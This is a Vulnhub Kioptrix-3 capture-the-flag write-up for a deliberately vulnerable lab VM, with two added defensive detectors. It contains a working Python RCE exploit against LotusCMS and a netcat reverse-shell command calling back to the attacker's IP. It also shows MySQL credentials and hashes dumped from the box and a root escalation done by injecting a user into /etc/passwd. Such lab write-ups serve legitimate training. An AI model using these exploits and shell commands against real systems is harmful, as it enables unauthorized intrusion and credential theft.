Welcome to the Kioptrix-3 writeup from Vulnhub
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Kioptrix-3
tags: Vulnhub
Easy
Linux
OSCP
Platform: Vulnhub
Difficulty: Easy
OS: Linux
On the box's Vulnhub page, we can find this recommendation:
Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com
Kioptrix: Level 1.2 (#3)
Enumeration
Nmap
To get started, we run a quick open ports scan.
$ nmap -Pn -T4 -p- 172.20.10.8
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 08:52 CEST
Nmap scan report for 172.20.10.8
Host is up (0.00041s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)
Nmap done: 1 IP address (1 host up) scanned in 5.04 seconds
Now that we know the open ports, let's scan them in depth.
$ nmap -A -Pn -p 22,80 172.20.10.8
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 08:53 CEST
Nmap scan report for 172.20.10.8
Host is up (0.00049s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.49 ms 172.20.10.8
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds
Port 80
When we visit the website on port 80, we find a small blog whose first post, "New Gallery Online!", mentions a photo gallery at http://kioptrix3.com/gallery.
Gallery
Looking at the source code of the website, we can find a commented-out admin login link.
<!-- <a href="gadmin">Admin</a> -->
Lotus CMS
Looking for vulnerabilities in Lotus CMS, we can find an RCE in this link, but I have only gotten the test injection to work.
Exploitation
Therefore, based on the exploit in that repository, we can write six very simple lines that give us an RCE to play with.
import requests, sys, urllib.parse
s = requests.session()
payload = "');${"+sys.argv[2]+"};#"
template = s.get('http://'+sys.argv[1]+'/index.php?page=index').text
r = s.get('http://'+sys.argv[1]+'/index.php?page=index'+urllib.parse.quote_plus(payload))
print(r.text.replace(template, '').strip())
Let's try it!
$ python3 rce.py 172.20.10.8 "system('id')"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Great! Let's see if we can get a shell. We start a listener in another terminal and try.
$ python3 rce.py 172.20.10.8 "system('nc -e /bin/bash 172.20.10.4 8787')"
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [172.20.10.4] from (UNKNOWN) [172.20.10.8] 60573
python -c "import pty; pty.spawn('/bin/bash')"
www-data@Kioptrix3:/home/www/kioptrix3.com$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
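From the defender's side, the injection above leaves a clear trace in the web server's access log: the page parameter carries quote, parenthesis, ${ and ; characters that no legitimate Lotus CMS page name ever has. The following detector is an added example, not part of the original writeup; it parses constructed Apache combined-format log lines (the sample lines and the log format are assumptions) and flags requests whose page parameter looks like an injection attempt.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log lines (combined log format); the third line is
# what a URL-encoded injection like the one in rce.py looks like on the wire.
SAMPLE_LOG = """\
172.20.10.4 - - [01/Jul/2021:09:01:12 +0200] "GET /index.php?page=index HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
172.20.10.4 - - [01/Jul/2021:09:01:15 +0200] "GET /gallery/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
172.20.10.4 - - [01/Jul/2021:09:02:40 +0200] "GET /index.php?page=index%27%29%3B%24%7Bsystem%28%27id%27%29%7D%3B%23 HTTP/1.1" 200 77 "-" "python-requests/2.25.1"
172.20.10.4 - - [01/Jul/2021:09:03:01 +0200] "GET /index.php?page=about HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Minimal combined-log-format parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# A real page name is a plain word. These tokens only appear when someone is
# trying to break out of the string the CMS builds around the page parameter.
SUSPICIOUS_TOKENS = ("'", ")", "${", ";", "#")

# Assumed allow-list of page names that legitimately exist on the site.
KNOWN_PAGES = {"index", "about", "blog", "contact"}


def is_injection_attempt(page_value):
    """True if the decoded page parameter contains break-out characters."""
    return any(tok in page_value for tok in SUSPICIOUS_TOKENS)


def find_lotuscms_injections(log_text):
    """Return a list of dicts (ip, ts, page) for requests that look like injection attempts."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse as combined log format
        query = urlsplit(m.group("target")).query
        # parse_qs percent-decodes the value, so %27%29 becomes ') for the check below
        for page in parse_qs(query).get("page", []):
            if is_injection_attempt(page) or page not in KNOWN_PAGES:
                hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "page": page})
    return hits


if __name__ == "__main__":
    for hit in find_lotuscms_injections(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} suspicious page parameter: {hit['page']!r}")
```

Because the check runs on the decoded value, double-encoded or plus-encoded variants of the same payload are caught as well; the allow-list catches unknown page names that avoid the listed characters.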
Post exploitation
Privilege escalation: www-data to loneferret
Enumeration
Inside the file /home/www/kioptrix3.com/gallery/gconfig.php we can find the MySQL credentials.
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
MySQL
www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$ mysql -u root -p'fuckeyou'
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| gallery |
| mysql |
+--------------------+
3 rows in set (0.00 sec)
mysql> use gallery;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+----------------------+
| Tables_in_gallery |
+----------------------+
| dev_accounts |
| gallarific_comments |
| gallarific_galleries |
| gallarific_photos |
| gallarific_settings |
| gallarific_stats |
| gallarific_users |
+----------------------+
7 rows in set (0.00 sec)
mysql> select * from gallarific_users;
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| userid | username | password | usertype | firstname | lastname | email | datejoined | website | issuperuser | photo | joincode |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| 1 | admin | n0t7t1k4 | superuser | Super | User | | 1302628616 | | 1 | | |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
1 row in set (0.01 sec)
mysql> select * from dev_accounts;
+----+------------+----------------------------------+
| id | username | password |
+----+------------+----------------------------------+
| 1 | dreg | 0d3eccfb887aabd50f243b3f155c0f85 |
| 2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+----+------------+----------------------------------+
2 rows in set (0.00 sec)
Now we have the gallery credentials and the MD5 hashes of the dreg and loneferret passwords. Let's see if we can recover the plaintext passwords.
Using the website CrackStation we can get the passwords in plain text.
Post exploitation
Privilege escalation: loneferret to root
Enumeration
Sudo
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery/photos$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
The ht binary is a text editor that, thanks to sudo, we can run with root permissions. Knowing this, we can get root in multiple ways. We are going to inject a user with root permissions into the /etc/passwd file.
Exploitation
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery/photos$ sudo /usr/local/bin/ht
To open the menu, we need to press Alt+F and go to Open to choose a file.
Now we need to type the path of the chosen file to edit.
Once the file is open, we add the line with our user at the end.
We need to press Alt+F again and select Save.
Now we just have to press Alt+F again and choose Quit.
Now we should be able to authenticate with the injected user and we would be root!
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery/photos$ su x4v1l0k
Password:
root@Kioptrix3:/home/www/kioptrix3.com/gallery/photos# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:/home/www/kioptrix3.com/gallery/photos#
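The injected entry leaves two artifacts that a local audit can catch: a second UID 0 account, and a password hash sitting in /etc/passwd instead of /etc/shadow. The following checker is an added example, not part of the original writeup; it runs over a constructed passwd file (the entries, the placeholder hash and the x4v1l0k line are assumptions modelled on the step above) and reports every entry that breaks those invariants.

```python
# Constructed sample /etc/passwd (not taken from the box). The last line is what an
# injected root-equivalent user looks like: UID 0, GID 0, hash in the password field.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:dreg,,,:/home/dreg:/bin/bash
x4v1l0k:$1$PLACEHOLDER$notarealhashXXXXXXXXXX:0:0::/root:/bin/bash
"""

# Values that mean "look in /etc/shadow" or "account locked" rather than a usable hash.
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def audit_passwd(text):
    """Return a list of (name, reason) findings for suspicious /etc/passwd entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry, expected 7 colon-separated fields"))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if not uid.isdigit():
            findings.append((name, "non-numeric UID"))
            continue
        # Any UID-0 account other than root is a second root login.
        if int(uid) == 0 and name != "root":
            findings.append((name, "UID 0 account that is not root"))
        # An empty field means passwordless login; anything that is not a
        # shadow marker is a hash readable by every local user.
        if pw == "":
            findings.append((name, "empty password field (passwordless login)"))
        elif pw not in SHADOWED_OR_LOCKED:
            findings.append((name, "password hash stored directly in /etc/passwd"))
    return findings


if __name__ == "__main__":
    for name, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"{name}: {reason}")
```

On a live system the same function can be fed the contents of /etc/passwd and run from cron or a configuration-management check, with a file-integrity monitor on /etc/passwd and /etc/sudoers as the second line of defence.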
And as we can see, this box of the series does have a flag.
root@Kioptrix3:/home/www/kioptrix3.com/gallery/photos# cd /root
root@Kioptrix3:~# ls
Congrats.txt ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.
Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.
The object is to learn, do some research and have a little (legal)
fun in the process.
I hope you enjoyed this third challenge.
Steven McElrea
aka loneferret
http://www.kioptrix.com
Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.
Main page CMS:
http://www.lotuscms.org
Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/
The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/
Also, all pictures were taken from Google Images, so being part of the
public domain I used them.
root@Kioptrix3:~#